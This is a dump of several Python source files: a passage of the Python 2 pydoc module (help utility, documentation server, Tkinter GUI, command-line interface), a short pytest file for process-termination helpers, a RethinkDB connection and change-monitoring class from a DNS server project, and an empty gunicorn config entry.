raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
try:
module_doc = __import__(modname).__doc__
except ImportError:
module_doc = None
desc = split(module_doc or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
self.url = 'http://%s:%d/' % (self.address[0], self.server_port)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
def onerror(modname):
pass
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done),
kwargs=dict(onerror=onerror)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
test_utility.py
|
import shlex
import subprocess
from multiprocessing import Process
from time import sleep
from src.raspberry_pi_driver.utility import (
hash_prefix,
terminate_cmd,
terminate_proc,
)
def test_hash_prefix():
res = hash_prefix("rokku")
expected = (
"320bda34a3c7f8dc49e5c976792f20ef5ec6f400b970138393020709bc2c1bc1"
)
assert res == expected
def test_terminate_proc(logger):
def test_fun():
while True:
sleep(1)
test_proc = Process(target=test_fun, name="Test Fun", args=())
test_proc.start()
terminate_proc(test_proc, logger)
assert not test_proc.is_alive()
def test_terminate_cmd(logger):
test_cmd = subprocess.Popen(shlex.split("sleep 10"))
terminate_cmd(test_cmd, "Test CMD", logger)
assert test_cmd.poll() is not None
|
data.py
|
#!/usr/bin/env python
# Flirble DNS Server
# RethinkDB handler
#
# Copyright 2016 Chris Luke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os, logging
log = logging.getLogger(os.path.basename(__file__))
import sys, threading, time, traceback
import rethinkdb as r
import FlirbleDNSServer as fdns
"""
Manages the connection with a RethinkDB.
There is at least one connection to the DB, used to queries and updates.
Further connections may be initiated and managed from their own threads
to monitor tables for changes; any such changes are delivered to callback
functions.
"""
class Data(object):
r = None
rlock = None
_table_threads = None
_tlock = None
_running = None
"""
Configure the database manager.
This does not start any connections, it only configures the object.
@param remote str The remote database to connect to in the format
"host:port". ':port' is optional and will the RethinkDB client
driver will default to '28015'.
@param name str The name of the database on the host to use.
@param auth str An authentication key. Defaults to an empty string.
@param ssl dict SSL options. See RethinkDB 'connect' for details.
"""
def __init__(self, remote, name, auth=None, ssl=dict()):
super(Data, self).__init__()
if auth is None:
auth = ""
self._table_threads = {}
if ':' in remote:
(host, port) = remote.split(':')
else:
host = remote
port = 28015
self._host = host
self._port = port
self._name = name
self._auth = auth
self._ssl = ssl
self.rlock = threading.Lock()
self._tlock = threading.Lock()
self.running = False
"""
Start the primary database connection.
@returns bool True on success, False otherwise.
"""
def start(self):
log.info("Connecting to RethinkDB at '%s:%s' db '%s'." %
(self._host, self._port, self._name))
try:
self.r = r.connect(host=self._host, port=self._port,
db=self._name, auth_key=self._auth, ssl=self._ssl)
except r.ReqlDriverError as e:
log.error("Unable to connect to RethinkDB at '%s:%s' " \
"db '%s': %s." %
(self._host, self._port, self._name, e.message))
log.debug("%s." % traceback.format_exc())
return False
self.running = True
"""
Adds a thread monitoring a table for changes, calling the cb when
a change is made.
The thread is a daemon thread so it will does not block the process
from exiting.
@param table str The name of the table to monitor.
@param cb function A function to call when changes arrive. This should
match the signature 'def _cb(self, rdb, change)' where 'rdb' is
a reference to this calling object and 'change' is a dictionary
containing the change. See RethinkDB documentation for the contents
of 'chamge'.
@returns bool True on success, False otherwise. Reasons to fail include
failing to connect to the database or trying to monitor a table
we're monitoring.
"""
def register_table(self, table, cb):
# create _monitor_thread
if table in self._table_threads:
return False
log.info("Connecting to RethinkDB at '%s:%s' db '%s' to monitor " \
"table '%s'." % (self._host, self._port, self._name, table))
try:
connection = r.connect(host=self._host, port=self._port,
db=self._name, auth_key=self._auth, ssl=self._ssl)
except r.ReqlDriverError as e:
log.error("Unable to connect to RethinkDB at '%s:%s' " \
"db '%s': %s." %
(self._host, self._port, self._name, e.message))
log.debug("%s." % traceback.format_exc())
return False
args = {
'table': table,
'cb': cb,
'connection': connection
}
try:
t = threading.Thread(target=self._monitor_thread, kwargs=args)
except Exception as e:
log.error("Unable to start monitoring thread for " \
"table '%s': %s." % (table, e.message))
log.debug("%s." % traceback.format_exc())
connection.close()
return False
with self._tlock:
self._table_threads[table] = {
"thread": t,
"connection": connection
}
t.daemon = True
t.start()
return True
"""
The thread target that monitors a table for changes.
@param table str The name of the table to monitor.
@param cb function The callback function that will be called.
@param connection rethinkdb.Connection The database connection to use
for the monitoring.
"""
def _monitor_thread(self, table, cb, connection):
log.info("Monitoring table '%s' for changes." % table)
feed = r.table(table).changes(include_initial=True).run(connection)
# TODO need to find a way to make this interruptible for a cleaner
# exit when we're asked to stop running
for change in feed:
cb(self, change)
if not self.running:
break
log.info("Closing RethinkDB connection for " \
"monitoring table '%s'." % table)
with self._tlock:
del(self._table_threads[table])
try:
connection.close()
except:
pass
"""
Stop all running data monitoring threads and shutdown connections
to the database.
"""
def stop(self):
log.info("Shutting down table monitoring threads...")
self.running = False
for table in self._table_threads:
tt = self._table_threads[table]
log.debug("Waiting for thread monitoring " \
"table '%s' to stop..." % table)
tt['thread'].join(1)
log.info("Closing main RethinkDB connection...")
self.r.close()
# Cleanup
self._table_threads = {}
self.r = None
|
gunicorn_conf.py
|
